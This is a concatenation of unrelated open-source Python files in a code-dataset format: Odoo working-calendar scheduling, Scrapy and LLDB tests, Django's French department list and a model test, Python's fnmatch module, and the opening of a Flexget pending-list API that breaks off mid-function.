tuple)): id = id[0] # Computes start_dt, end_dt (with default values if not set) + off-interval work limits work_limits = [] if start_dt is None and end_dt is not None: start_dt = end_dt.replace(hour=0, minute=0, second=0) elif start_dt is None: start_dt = datetime.datetime.now().replace(hour=0, minute=0, second=0) else: work_limits.append((start_dt.replace(hour=0, minute=0, second=0), start_dt)) if end_dt is None: end_dt = start_dt.replace(hour=23, minute=59, second=59) else: work_limits.append((end_dt, end_dt.replace(hour=23, minute=59, second=59))) assert start_dt.date() == end_dt.date(), 'get_working_intervals_of_day is restricted to one day' intervals = [] work_dt = start_dt.replace(hour=0, minute=0, second=0) # no calendar: try to use the default_interval, then return directly if id is None: if default_interval: working_interval = (start_dt.replace(hour=default_interval[0], minute=0, second=0), start_dt.replace(hour=default_interval[1], minute=0, second=0)) intervals = self.interval_remove_leaves(working_interval, work_limits) return intervals working_intervals = [] for calendar_working_day in self.get_attendances_for_weekdays(cr, uid, id, [start_dt.weekday()], context): working_interval = ( work_dt.replace(hour=int(calendar_working_day.hour_from)), work_dt.replace(hour=int(calendar_working_day.hour_to)) ) working_intervals += self.interval_remove_leaves(working_interval, work_limits) # find leave intervals if leaves is None and compute_leaves: leaves = self.get_leave_intervals(cr, uid, id, resource_id=resource_id, context=None) # filter according to leaves for interval in working_intervals: work_intervals = self.interval_remove_leaves(interval, leaves) intervals += work_intervals return intervals def get_working_hours_of_date(self, cr, uid, id, start_dt=None, end_dt=None, leaves=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """ Get the working hours of the day based on calendar. This method uses get_working_intervals_of_day to have the work intervals of the day. It then calculates the number of hours contained in those intervals. """ res = datetime.timedelta() intervals = self.get_working_intervals_of_day( cr, uid, id, start_dt, end_dt, leaves, compute_leaves, resource_id, default_interval, context) for interval in intervals: res += interval[1] - interval[0] return seconds(res) / 3600.0 def get_working_hours(self, cr, uid, id, start_dt, end_dt, compute_leaves=False, resource_id=None, default_interval=None, context=None): hours = 0.0 for day in rrule.rrule(rrule.DAILY, dtstart=start_dt, until=(end_dt + datetime.timedelta(days=1)).replace(hour=0, minute=0, second=0), byweekday=self.get_weekdays(cr, uid, id, context=context)): day_start_dt = day.replace(hour=0, minute=0, second=0) if start_dt and day.date() == start_dt.date(): day_start_dt = start_dt day_end_dt = day.replace(hour=23, minute=59, second=59) if end_dt and day.date() == end_dt.date(): day_end_dt = end_dt hours += self.get_working_hours_of_date( cr, uid, id, start_dt=day_start_dt, end_dt=day_end_dt, compute_leaves=compute_leaves, resource_id=resource_id, default_interval=default_interval, context=context) return hours # -------------------------------------------------- # Hours scheduling # -------------------------------------------------- def _schedule_hours(self, cr, uid, id, hours, day_dt=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """ Schedule hours of work, using a calendar and an optional resource to compute working and leave days. This method can be used backwards, i.e. scheduling days before a deadline. :param int hours: number of hours to schedule. Use a negative number to compute a backwards scheduling. :param datetime day_dt: reference date to compute working days. If days is > 0 date is the starting date. If days is < 0 date is the ending date. :param boolean compute_leaves: if set, compute the leaves based on calendar and resource. Otherwise no leaves are taken into account. :param int resource_id: the id of the resource to take into account when computing the leaves. If not set, only general leaves are computed. If set, generic and specific leaves are computed. :param tuple default_interval: if no id, try to return a default working day using default_interval[0] as beginning hour, and default_interval[1] as ending hour. Example: default_interval = (8, 16). Otherwise, a void list of working intervals is returned when id is None. :return tuple (datetime, intervals): datetime is the beginning/ending date of the schedulign; intervals are the working intervals of the scheduling. Note: Why not using rrule.rrule ? Because rrule does not seem to allow getting back in time. """ if day_dt is None: day_dt = datetime.datetime.now() backwards = (hours < 0) hours = abs(hours) intervals = [] remaining_hours = hours * 1.0 iterations = 0 current_datetime = day_dt call_args = dict(compute_leaves=compute_leaves, resource_id=resource_id, default_interval=default_interval, context=context) while float_compare(remaining_hours, 0.0, precision_digits=2) in (1, 0) and iterations < 1000: if backwards: call_args['end_dt'] = current_datetime else: call_args['start_dt'] = current_datetime working_intervals = self.get_working_intervals_of_day(cr, uid, id, **call_args) if id is None and not working_intervals: # no calendar -> consider working 8 hours remaining_hours -= 8.0 elif working_intervals: if backwards: working_intervals.reverse() new_working_intervals = self.interval_schedule_hours(working_intervals, remaining_hours, not backwards) if backwards: new_working_intervals.reverse() res = datetime.timedelta() for interval in working_intervals: res += interval[1] - interval[0] remaining_hours -= (seconds(res) / 3600.0) if backwards: intervals = new_working_intervals + intervals else: intervals = intervals + new_working_intervals # get next day if backwards: current_datetime = datetime.datetime.combine(self.get_previous_day(cr, uid, id, current_datetime, context), datetime.time(23, 59, 59)) else: current_datetime = datetime.datetime.combine(self.get_next_day(cr, uid, id, current_datetime, context), datetime.time()) # avoid infinite loops iterations += 1 return intervals def schedule_hours_get_date(self, cr, uid, id, hours, day_dt=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """ Wrapper on _schedule_hours: return the beginning/ending datetime of an hours scheduling. """ res = self._schedule_hours(cr, uid, id, hours, day_dt, compute_leaves, resource_id, default_interval, context) return res and res[0][0] or False def schedule_hours(self, cr, uid, id, hours, day_dt=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """ Wrapper on _schedule_hours: return the working intervals of an hours scheduling. """ return self._schedule_hours(cr, uid, id, hours, day_dt, compute_leaves, resource_id, default_interval, context) # -------------------------------------------------- # Days scheduling # -------------------------------------------------- def _schedule_days(self, cr, uid, id, days, day_date=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """Schedule days of work, using a calendar and an optional resource to compute working and leave days. This method can be used backwards, i.e. scheduling days before a deadline. :param int days: number of days to schedule. Use a negative number to compute a backwards scheduling. :param date day_date: reference date to compute working days. If days is > 0 date is the starting date. If days is < 0 date is the ending date. :param boolean compute_leaves: if set, compute the leaves based on calendar and resource. Otherwise no leaves are taken into account. :param int resource_id: the id of the resource to take into account when computing the leaves. If not set, only general leaves are computed. If set, generic and specific leaves are computed. :param tuple default_interval: if no id, try to return a default working day using default_interval[0] as beginning hour, and default_interval[1] as ending hour. Example: default_interval = (8, 16). Otherwise, a void list of working intervals is returned when id is None. :return tuple (datetime, intervals): datetime is the beginning/ending date of the schedulign; intervals are the working intervals of the scheduling. Implementation note: rrule.rrule is not used because rrule it des not seem to allow getting back in time. """ if day_date is None: day_date = datetime.datetime.now() backwards = (days < 0) days = abs(days) intervals = [] planned_days = 0 iterations = 0 if backwards: current_datetime = day_date.replace(hour=23, minute=59, second=59) else: current_datetime = day_date.replace(hour=0, minute=0, second=0) while planned_days < days and iterations < 1000: working_intervals = self.get_working_intervals_of_day( cr, uid, id, current_datetime, compute_leaves=compute_leaves, resource_id=resource_id, default_interval=default_interval, context=context) if id is None or working_intervals: # no calendar -> no working hours, but day is considered as worked planned_days += 1 intervals += working_intervals # get next day if backwards: current_datetime = self.get_previous_day(cr, uid, id, current_datetime, context) else: current_datetime = self.get_next_day(cr, uid, id, current_datetime, context) # avoid infinite loops iterations += 1 return intervals def schedule_days_get_date(self, cr, uid, id, days, day_date=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """ Wrapper on _schedule_days: return the beginning/ending datetime of a days scheduling. """ res = self._schedule_days(cr, uid, id, days, day_date, compute_leaves, resource_id, default_interval, context) return res and res[-1][1] or False def schedule_days(self, cr, uid, id, days, day_date=None, compute_leaves=False, resource_id=None, default_interval=None, context=None): """ Wrapper on _schedule_days: return the working intervals of a days scheduling. """ return self._schedule_days(cr, uid, id, days, day_date, compute_leaves, resource_id, default_interval, context) # -------------------------------------------------- # Compatibility / to clean / to remove # -------------------------------------------------- def working_hours_on_day(self, cr, uid, resource_calendar_id, day, context=None): """ Used in hr_payroll/hr_payroll.py :deprecated: OpenERP saas-3. Use get_working_hours_of_date instead. Note: since saas-3, take hour/minutes into account, not just the whole day.""" if isinstance(day, datetime.datetime): day = day.replace(hour=0, minute=0) return self.get_working_hours_of_date(cr, uid, resource_calendar_id.id, start_dt=day, context=None) def interval_min_get(self, cr, uid, id, dt_from, hours, resource=False): """ Schedule hours backwards. Used in mrp_operations/mrp_operations.py. :deprecated: OpenERP saas-3. Use schedule_hours instead. Note: since saas-3, counts leave hours instead of all-day leaves.""" return self.schedule_hours( cr, uid, id, hours * -1.0, day_dt=dt_from.replace(minute=0, second=0), compute_leaves=True, resource_id=resource, default_interval=(8, 16) ) def interval_get_multi(self, cr, uid, date_and_hours_by_cal, resource=False, byday=True): """ Used in mrp_operations/mrp_operations.py (default parameters) and in interval_get() :deprecated: OpenERP saas-3. Use schedule_hours instead. Note: Byday was not used. Since saas-3, counts Leave hours instead of all-day leaves.""" res = {} for dt_str, hours, calendar_id in date_and_hours_by_cal: result = self.schedule_hours( cr, uid, calendar_id, hours, day_dt=datetime.datetime.strptime(dt_str, '%Y-%m-%d %H:%M:%S').replace(minute=0, second=0), compute_leaves=True, resource_id=resource, default_interval=(8, 16) ) res[(dt_str, hours, calendar_id)] = result return res def interval_get(self, cr, uid, id, dt_from, hours, resource=False, byday=True): """ Unifier of interval_get_multi. Used in: mrp_operations/mrp_operations.py, crm/crm_lead.py (res given). :deprecated: OpenERP saas-3. Use get_working_hours instead.""" res = self.interval_get_multi( cr, uid, [(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)], resource, byday)[(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)] return res def interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource=False): """ Unused wrapper. :deprecated: OpenERP saas-3. Use get_working_hours instead.""" return self._interval_hours_get(cr, uid, id, dt_from, dt_to, resource_id=resource) def _interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource_id=False, timezone_from_uid=None, exclude_leaves=True, context=None): """ Computes working hours between two dates, taking always same hour/minuts. :deprecated: OpenERP saas-3. Use get_working_hours instead. Note: since saas-3, now resets hour/minuts. Now counts leave hours instead of all-day leaves.""" return self.get_working_hours( cr, uid, id, dt_from, dt_to, compute_leaves=(not exclude_leaves), resource_id=resource_id, default_interval=(8, 16), context=context) class resource_calendar_attendance(osv.osv): _name = "resource.calendar.attendance" _description = "Work Detail" _columns = { 'name' : fields.char("Name", required=True), 'dayofweek': fields.selection([('0','Monday'),('1','Tuesday'),('2','Wednesday'),('3','Thursday'),('4','Friday'),('5','Saturday'),('6','Sunday')], 'Day of Week', required=True, select=True), 'date_from' : fields.date('Starting Date'), 'hour_from' : fields.float('Work from', required=True, help="Start and End time of working.", select=True), 'hour_to' : fields.float("Work to", required=True), 'calendar_id' : fields.many2one("resource.calendar", "Resource's Calendar", required=True), } _order = 'dayofweek, hour_from' _defaults = { 'dayofweek' : '0' } def hours_time_string(hours): """ convert a number of hours (float) into a string with format '%H:%M' """ minutes = int(round(hours * 60)) return "%02d:%02d" % divmod(minutes, 60) class resource_resource(osv.osv): _name = "resource.resource" _description = "Resource Detail" _columns = { 'name': fields.char("Name", required=True), 'code': fields.char('Code', size=16, copy=False), 'active' : fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the resource record without removing it."), 'company_id' : fields.many2one('res.company', 'Company'), 'resource_type': fields.selection([('user','Human'),('material','Material')], 'Resource Type', required=True), 'user_id' : fields.many2one('res.users', 'User', help='Related user name for the resource to manage its access.'), 'time_efficiency' : fields.float('Efficiency Factor', size=8, required=True, help="This field depict the efficiency of the resource to complete tasks. e.g resource put alone on a phase of 5 days with 5 tasks assigned to him, will show a load of 100% for this phase by default, but if we put a efficiency of 200%, then his load will only be 50%."), 'calendar_id' : fields.many2one("resource.calendar", "Working Time", help="Define the schedule of resource"), } _defaults = { 'resource_type' : 'user', 'time_efficiency' : 1, 'active' : True, 'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.resource', context=context) } def copy(self, cr, uid, id, default=None, context=None): if default is None: default = {} if not default.get('name', False): default.update(name=_('%s (copy)') % (self.browse(cr, uid, id, context=context).name)) return super(resource_resource, self).copy(cr, uid, id, default, context) def generate_resources(self, cr, uid, user_ids, calendar_id, context=None): """ Return a list of Resource Class objects for the resources allocated to the phase. NOTE: Used in project/project.py """ resource_objs = {} user_pool = self.pool.get('res.users') for user in user_pool.browse(cr, uid, user_ids, context=context): resource_objs[user.id] = { 'name' : user.name, 'vacation': [], 'efficiency': 1.0, } resource_ids = self.search(cr, uid, [('user_id', '=', user.id)], context=context) if resource_ids: for resource in self.browse(cr, uid, resource_ids, context=context): resource_objs[user.id]['efficiency'] = resource.time_efficiency resource_cal = resource.calendar_id.id if resource_cal: leaves = self.compute_vacation(cr, uid, calendar_id, resource.id, resource_cal, context=context) resource_objs[user.id]['vacation'] += list(leaves) return resource_objs def compute_vacation(self, cr, uid, calendar_id, resource_id=False, resource_calendar=False, context=None): """ Compute the vacation from the working calendar of the resource. @param calendar_id : working calendar of the project @param resource_id : resource working on phase/task @param resource_calendar : working calendar of the resource NOTE: used in project/project.py, and in generate_resources """ resource_calendar_leaves_pool = self.pool.get('resource.calendar.leaves') leave_list = [] if resource_id: leave_ids = resource_calendar_leaves_pool.search(cr, uid, ['|', ('calendar_id', '=', calendar_id), ('calendar_id', '=', resource_calendar), ('resource_id', '=', resource_id) ], context=context) else: leave_ids = resource_calendar_leaves_pool.search(cr, uid, [('calendar_id', '=', calendar_id), ('resource_id', '=', False) ], context=context) leaves = resource_calendar_leaves_pool.read(cr, uid, leave_ids, ['date_from', 'date_to'], context=context) for i in range(len(leaves)): dt_start = datetime.datetime.strptime(leaves[i]['date_from'], '%Y-%m-%d %H:%M:%S') dt_end = datetime.datetime.strptime(leaves[i]['date_to'], '%Y-%m-%d %H:%M:%S') no = dt_end - dt_start [leave_list.append((dt_start + datetime.timedelta(days=x)).strftime('%Y-%m-%d')) for x in range(int(no.days + 1))] leave_list.sort() return leave_list def compute_working_calendar(self, cr, uid, calendar_id=False, context=None): """ Change the format of working calendar from 'Openerp' format to bring it into 'Faces' format. @param calendar_id : working calendar of the project NOTE: used in project/project.py """ if not calendar_id: # Calendar is not specified: working days: 24/7 return [('fri', '8:0-12:0','13:0-17:0'), ('thu', '8:0-12:0','13:0-17:0'), ('wed', '8:0-12:0','13:0-17:0'), ('mon', '8:0-12:0','13:0-17:0'), ('tue', '8:0-12:0','13:0-17:0')] resource_attendance_pool = self.pool.get('resource.calendar.attendance') time_range = "8:00-8:00" non_working = "" week_days = {"0": "mon", "1": "tue", "2": "wed","3": "thu", "4": "fri", "5": "sat", "6": "sun"} wk_days = {} wk_time = {} wktime_list = [] wktime_cal = [] week_ids = resource_attendance_pool.search(cr, uid, [('calendar_id', '=', calendar_id)], context=context) weeks = resource_attendance_pool.read(cr, uid, week_ids, ['dayofweek', 'hour_from', 'hour_to'], context=context) # Convert time formats into appropriate format required # and create a list like [('mon', '8:00-12:00'), ('mon', '13:00-18:00')] for week in weeks: res_str = "" day = None if week_days.get(week['dayofweek'],False): day = week_days[week['dayofweek']] wk_days[week['dayofweek']] = week_days[week['dayofweek']] else: raise osv.except_osv(_('Configuration Error!'),_('Make sure the Working time has been configured with proper week days!')) hour_from_str = hours_time_string(week['hour_from']) hour_to_str = hours_time_string(week['hour_to']) res_str = hour_from_str + '-' + hour_to_str wktime_list.append((day, res_str)) # Convert into format like [('mon', '8:00-12:00', '13:00-18:00')] for item in wktime_list: if wk_time.has_key(item[0]): wk_time[item[0]].append(item[1]) else: wk_time[item[0]] = [item[0]] wk_time[item[0]].append(item[1]) for k,v in wk_time.items(): wktime_cal.append(tuple(v)) # Add for the non-working days like: [('sat, sun', '8:00-8:00')] for k, v in wk_days.items(): if week_days.has_key(k): week_days.pop(k) for v in week_days.itervalues(): non_working += v + ',' if non_working: wktime_cal.append((non_working[:-1], time_range)) return wktime_cal class resource_calendar_leaves(osv.osv): _name = "resource.calendar.leaves" _description = "Leave Detail" _columns = { 'name' : fields.char("Name"), 'company_id' : fields.related('calendar_id','company_id',type='many2one',relation='res.company',string="Company", store=True, readonly=True), 'calendar_id' : fields.many2one("resource.calendar", "Working Time"), 'date_from' : fields.datetime('Start Date', required=True), 'date_to' : fields.datetime('End Date', required=True), 'resource_id' : fields.many2one("resource.resource", "Resource", help="If empty, this is a generic holiday for the company. If a resource is set, the holiday/leave is only for this resource"), } def check_dates(self, cr, uid, ids, context=None): for leave in self.browse(cr, uid, ids, context=context): if leave.date_from and leave.date_to and leave.date_from > leave.date_to: return False return True _constraints = [ (check_dates, 'Error! leave start-date must be lower then leave end-date.', ['date_from', 'date_to']) ] def onchange_resource(self, cr, uid, ids, resource, context=None): result = {} if resource: resource_pool = self.pool.get('resource.resource') result['calendar_id'] = resource_pool.browse(cr, uid, resource, context=context).calendar_id.id return {'value': result} return {'value': {'calendar_id': []}} def seconds(td): assert isinstance(td, datetime.timedelta) return (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) / 10.**6 # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
1900/scrapy
scrapy/tests/test_spidermiddleware_httperror.py
27
1658
from unittest import TestCase from scrapy.http import Response, Request from scrapy.spider import BaseSpider from scrapy.contrib.spidermiddleware.httperror import HttpErrorMiddleware, HttpError class TestHttpErrorMiddleware(TestCase): def setUp(self): self.spider = BaseSpider('foo') self.mw = HttpErrorMiddleware() self.req = Request('http://scrapytest.org') self.res200 = Response('http://scrapytest.org', status=200) self.res200.request = self.req self.res404 = Response('http://scrapytest.org', status=404) self.res404.request = self.req def test_process_spider_input(self): self.assertEquals(None, self.mw.process_spider_input(self.res200, self.spider)) self.assertRaises(HttpError, self.mw.process_spider_input, self.res404, self.spider) def test_process_spider_exception(self): self.assertEquals([], self.mw.process_spider_exception(self.res404, \ HttpError(self.res404), self.spider)) self.assertEquals(None, self.mw.process_spider_exception(self.res404, \ Exception(), self.spider)) def test_handle_httpstatus_list(self): res = self.res404.copy() res.request = Request('http://scrapytest.org', meta={'handle_httpstatus_list': [404]}) self.assertEquals(None, self.mw.process_spider_input(res, self.spider)) self.spider.handle_httpstatus_list = [404] self.assertEquals(None, self.mw.process_spider_input(self.res404, self.spider))
bsd-3-clause
apple/llvm-project
lldb/test/API/commands/expression/static-initializers/TestStaticInitializers.py
4
1627
import lldb from lldbsuite.test.decorators import * from lldbsuite.test.lldbtest import * from lldbsuite.test import lldbutil class StaticInitializers(TestBase): mydir = TestBase.compute_mydir(__file__) @expectedFailureAll(archs="aarch64", oslist=["freebsd", "linux"], bugnumber="https://bugs.llvm.org/show_bug.cgi?id=44053") def test(self): """ Test a static initializer. """ self.build() lldbutil.run_to_source_breakpoint(self, '// break here', lldb.SBFileSpec("main.cpp", False)) # We use counter to observe if the initializer was called. self.expect_expr("counter", result_type="int", result_value="0") self.expect("expr -p -- struct Foo { Foo() { inc_counter(); } }; Foo f;") self.expect_expr("counter", result_type="int", result_value="1") def test_failing_init(self): """ Test a static initializer that fails to execute. """ self.build() lldbutil.run_to_source_breakpoint(self, '// break here', lldb.SBFileSpec("main.cpp", False)) # FIXME: This error message is not even remotely helpful. self.expect("expr -p -- struct Foo2 { Foo2() { do_abort(); } }; Foo2 f;", error=True, substrs=["error: couldn't run static initializer:"]) def test_without_process(self): """ Test a static initializer without a running process. """ self.expect("expr -p -- int i = 0; struct Foo3 { Foo3() { ++i; } }; Foo3 f;", error=True, substrs=["Top-level code needs to be inserted into a runnable target"])
apache-2.0
3quarterstack/simple_blog
django/contrib/localflavor/fr/fr_department.py
109
3687
# -*- coding: utf-8 -*- # See the "Code officiel géographique" on the INSEE website <www.insee.fr>. from __future__ import unicode_literals DEPARTMENT_CHOICES = ( # Metropolitan departments ('01', '01 - Ain'), ('02', '02 - Aisne'), ('03', '03 - Allier'), ('04', '04 - Alpes-de-Haute-Provence'), ('05', '05 - Hautes-Alpes'), ('06', '06 - Alpes-Maritimes'), ('07', '07 - Ardèche'), ('08', '08 - Ardennes'), ('09', '09 - Ariège'), ('10', '10 - Aube'), ('11', '11 - Aude'), ('12', '12 - Aveyron'), ('13', '13 - Bouches-du-Rhône'), ('14', '14 - Calvados'), ('15', '15 - Cantal'), ('16', '16 - Charente'), ('17', '17 - Charente-Maritime'), ('18', '18 - Cher'), ('19', '19 - Corrèze'), ('2A', '2A - Corse-du-Sud'), ('2B', '2B - Haute-Corse'), ('21', '21 - Côte-d\'Or'), ('22', '22 - Côtes-d\'Armor'), ('23', '23 - Creuse'), ('24', '24 - Dordogne'), ('25', '25 - Doubs'), ('26', '26 - Drôme'), ('27', '27 - Eure'), ('28', '28 - Eure-et-Loir'), ('29', '29 - Finistère'), ('30', '30 - Gard'), ('31', '31 - Haute-Garonne'), ('32', '32 - Gers'), ('33', '33 - Gironde'), ('34', '34 - Hérault'), ('35', '35 - Ille-et-Vilaine'), ('36', '36 - Indre'), ('37', '37 - Indre-et-Loire'), ('38', '38 - Isère'), ('39', '39 - Jura'), ('40', '40 - Landes'), ('41', '41 - Loir-et-Cher'), ('42', '42 - Loire'), ('43', '43 - Haute-Loire'), ('44', '44 - Loire-Atlantique'), ('45', '45 - Loiret'), ('46', '46 - Lot'), ('47', '47 - Lot-et-Garonne'), ('48', '48 - Lozère'), ('49', '49 - Maine-et-Loire'), ('50', '50 - Manche'), ('51', '51 - Marne'), ('52', '52 - Haute-Marne'), ('53', '53 - Mayenne'), ('54', '54 - Meurthe-et-Moselle'), ('55', '55 - Meuse'), ('56', '56 - Morbihan'), ('57', '57 - Moselle'), ('58', '58 - Nièvre'), ('59', '59 - Nord'), ('60', '60 - Oise'), ('61', '61 - Orne'), ('62', '62 - Pas-de-Calais'), ('63', '63 - Puy-de-Dôme'), ('64', '64 - Pyrénées-Atlantiques'), ('65', '65 - Hautes-Pyrénées'), ('66', '66 - Pyrénées-Orientales'), ('67', '67 - Bas-Rhin'), ('68', '68 - Haut-Rhin'), ('69', '69 - Rhône'), ('70', '70 - Haute-Saône'), ('71', '71 - Saône-et-Loire'), ('72', '72 - Sarthe'), ('73', '73 - Savoie'), ('74', '74 - Haute-Savoie'), ('75', '75 - Paris'), ('76', '76 - Seine-Maritime'), ('77', '77 - Seine-et-Marne'), ('78', '78 - Yvelines'), ('79', '79 - Deux-Sèvres'), ('80', '80 - Somme'), ('81', '81 - Tarn'), ('82', '82 - Tarn-et-Garonne'), ('83', '83 - Var'), ('84', '84 - Vaucluse'), ('85', '85 - Vendée'), ('86', '86 - Vienne'), ('87', '87 - Haute-Vienne'), ('88', '88 - Vosges'), ('89', '89 - Yonne'), ('90', '90 - Territoire de Belfort'), ('91', '91 - Essonne'), ('92', '92 - Hauts-de-Seine'), ('93', '93 - Seine-Saint-Denis'), ('94', '94 - Val-de-Marne'), ('95', '95 - Val-d\'Oise'), # Overseas departments, communities, and other territories ('971', '971 - Guadeloupe'), ('972', '972 - Martinique'), ('973', '973 - Guyane'), ('974', '974 - La Réunion'), ('975', '975 - Saint-Pierre-et-Miquelon'), ('976', '976 - Mayotte'), ('977', '977 - Saint-Barthélemy'), ('978', '978 - Saint-Martin'), ('984', '984 - Terres australes et antarctiques françaises'), ('986', '986 - Wallis et Futuna'), ('987', '987 - Polynésie française'), ('988', '988 - Nouvelle-Calédonie'), ('989', '989 - Île de Clipperton'), )
mit
benjaminrigaud/django
tests/model_package/tests.py
29
2538
from __future__ import unicode_literals from django.contrib.sites.models import Site from django.db import models from django.test import TestCase from .models.publication import Publication from .models.article import Article class Advertisement(models.Model): customer = models.CharField(max_length=100) publications = models.ManyToManyField("model_package.Publication", blank=True) class ModelPackageTests(TestCase): def test_model_packages(self): p = Publication.objects.create(title="FooBar") current_site = Site.objects.get_current() self.assertEqual(current_site.domain, "example.com") # Regression for #12168: models split into subpackages still get M2M # tables a = Article.objects.create(headline="a foo headline") a.publications.add(p) a.sites.add(current_site) a = Article.objects.get(id=a.pk) self.assertEqual(a.id, a.pk) self.assertEqual(a.sites.count(), 1) # Regression for #12245 - Models can exist in the test package, too ad = Advertisement.objects.create(customer="Lawrence Journal-World") ad.publications.add(p) ad = Advertisement.objects.get(id=ad.pk) self.assertEqual(ad.publications.count(), 1) # Regression for #12386 - field names on the autogenerated intermediate # class that are specified as dotted strings don't retain any path # component for the field or column name self.assertEqual( Article.publications.through._meta.fields[1].name, 'article' ) self.assertEqual( Article.publications.through._meta.fields[1].get_attname_column(), ('article_id', 'article_id') ) self.assertEqual( Article.publications.through._meta.fields[2].name, 'publication' ) self.assertEqual( Article.publications.through._meta.fields[2].get_attname_column(), ('publication_id', 'publication_id') ) # The oracle backend truncates the name to 'model_package_article_publ233f'. self.assertTrue( Article._meta.get_field('publications').m2m_db_table() in ('model_package_article_publications', 'model_package_article_publ233f') ) self.assertEqual( Article._meta.get_field('publications').m2m_column_name(), 'article_id' ) self.assertEqual( Article._meta.get_field('publications').m2m_reverse_name(), 'publication_id' )
bsd-3-clause
barbarubra/Don-t-know-What-i-m-doing.
python/src/Lib/fnmatch.py
194
3019
"""Filename matching with shell patterns. fnmatch(FILENAME, PATTERN) matches according to the local convention. fnmatchcase(FILENAME, PATTERN) always takes case in account. The functions operate by translating the pattern into a regular expression. They cache the compiled regular expressions for speed. The function translate(PATTERN) returns a regular expression corresponding to PATTERN. (It does not compile it.) """ import re __all__ = ["filter", "fnmatch","fnmatchcase","translate"] _cache = {} def fnmatch(name, pat): """Test whether FILENAME matches PATTERN. Patterns are Unix shell style: * matches everything ? matches any single character [seq] matches any character in seq [!seq] matches any char not in seq An initial period in FILENAME is not special. Both FILENAME and PATTERN are first case-normalized if the operating system requires it. If you don't want this, use fnmatchcase(FILENAME, PATTERN). """ import os name = os.path.normcase(name) pat = os.path.normcase(pat) return fnmatchcase(name, pat) def filter(names, pat): """Return the subset of the list NAMES that match PAT""" import os,posixpath result=[] pat=os.path.normcase(pat) if not pat in _cache: res = translate(pat) _cache[pat] = re.compile(res) match=_cache[pat].match if os.path is posixpath: # normcase on posix is NOP. Optimize it away from the loop. for name in names: if match(name): result.append(name) else: for name in names: if match(os.path.normcase(name)): result.append(name) return result def fnmatchcase(name, pat): """Test whether FILENAME matches PATTERN, including case. This is a version of fnmatch() which doesn't case-normalize its arguments. """ if not pat in _cache: res = translate(pat) _cache[pat] = re.compile(res) return _cache[pat].match(name) is not None def translate(pat): """Translate a shell PATTERN to a regular expression. There is no way to quote meta-characters. """ i, n = 0, len(pat) res = '' while i < n: c = pat[i] i = i+1 if c == '*': res = res + '.*' elif c == '?': res = res + '.' elif c == '[': j = i if j < n and pat[j] == '!': j = j+1 if j < n and pat[j] == ']': j = j+1 while j < n and pat[j] != ']': j = j+1 if j >= n: res = res + '\\[' else: stuff = pat[i:j].replace('\\','\\\\') i = j+1 if stuff[0] == '!': stuff = '^' + stuff[1:] elif stuff[0] == '^': stuff = '\\' + stuff res = '%s[%s]' % (res, stuff) else: res = res + re.escape(c) return res + "$"
apache-2.0
Danfocus/Flexget
flexget/components/managed_lists/lists/pending_list/api.py
4
10945
from __future__ import unicode_literals, division, absolute_import from builtins import * # pylint: disable=unused-import, redefined-builtin import copy import logging from math import ceil from flask import jsonify, request from sqlalchemy.orm.exc import NoResultFound from flexget.api import api, APIResource from flexget.api.app import ( NotFoundError, base_message_schema, success_response, etag, pagination_headers, Conflict, BadRequest, ) from . import db log = logging.getLogger('pending_list') pending_list_api = api.namespace('pending_list', description='Pending List operations') class ObjectsContainer(object): pending_list_base_object = { 'type': 'object', 'properties': { 'id': {'type': 'integer'}, 'name': {'type': 'string'}, 'added_on': {'type': 'string'}, }, } pending_list_input_object = copy.deepcopy(pending_list_base_object) del pending_list_input_object['properties']['id'] del pending_list_input_object['properties']['added_on'] pending_list_return_lists = {'type': 'array', 'items': pending_list_base_object} base_entry_object = { 'type': 'object', 'properties': { 'title': {'type': 'string'}, 'original_url': {'type': 'string'}, 'approved': {'type': 'boolean'}, }, 'required': ['title', 'original_url'], 'additionalProperties': True, } pending_list_entry_base_object = { 'type': 'object', 'properties': { 'id': {'type': 'integer'}, 'name': {'type': 'string'}, 'added_on': {'type': 'string'}, 'title': {'type': 'string'}, 'original_url': {'type': 'string'}, 'approved': {'type': 'boolean'}, 'entry': base_entry_object, }, } operation_object = { 'type': 'object', 'properties': {'operation': {'type': 'string', 'enum': ['approve', 'reject']}}, 'required': ['operation'], 'additionalProperties': False, } pending_lists_entries_return_object = { 'type': 'array', 'items': pending_list_entry_base_object, } pending_list_object_schema = api.schema_model( 'pending_list.return_list', ObjectsContainer.pending_list_base_object ) pending_list_input_object_schema = api.schema_model( 'pending_list.input_list', ObjectsContainer.pending_list_input_object ) pending_list_return_lists_schema = api.schema_model( 'pending_list.return_lists', ObjectsContainer.pending_list_return_lists ) pending_list_operation_schema = api.schema_model( 'pending_list.operation_schema', ObjectsContainer.operation_object ) list_parser = api.parser() list_parser.add_argument('name', help='Filter results by list name') @pending_list_api.route('/') class PendingListListsAPI(APIResource): @etag @api.doc(parser=list_parser) @api.response(200, 'Successfully retrieved pending lists', pending_list_return_lists_schema) def get(self, session=None): """ Get pending lists """ args = list_parser.parse_args() name = args.get('name') pending_lists = [ pending_list.to_dict() for pending_list in db.get_pending_lists(name=name, session=session) ] return jsonify(pending_lists) @api.validate(pending_list_input_object_schema) @api.response(201, model=pending_list_object_schema) @api.response(Conflict) def post(self, session=None): """ Create a new pending list """ data = request.json name = data.get('name') try: db.get_list_by_exact_name(name=name, session=session) except NoResultFound: pass else: raise Conflict('list with name \'%s\' already exists' % name) pending_list = db.PendingListList() pending_list.name = name session.add(pending_list) session.commit() resp = jsonify(pending_list.to_dict()) resp.status_code = 201 return resp @pending_list_api.route('/<int:list_id>/') @api.doc(params={'list_id': 'ID of the list'}) class PendingListListAPI(APIResource): @etag @api.response(NotFoundError) @api.response(200, model=pending_list_object_schema) def get(self, list_id, session=None): """ Get pending list by ID """ try: list = db.get_list_by_id(list_id=list_id, session=session) except NoResultFound: raise NotFoundError('list_id %d does not exist' % list_id) return 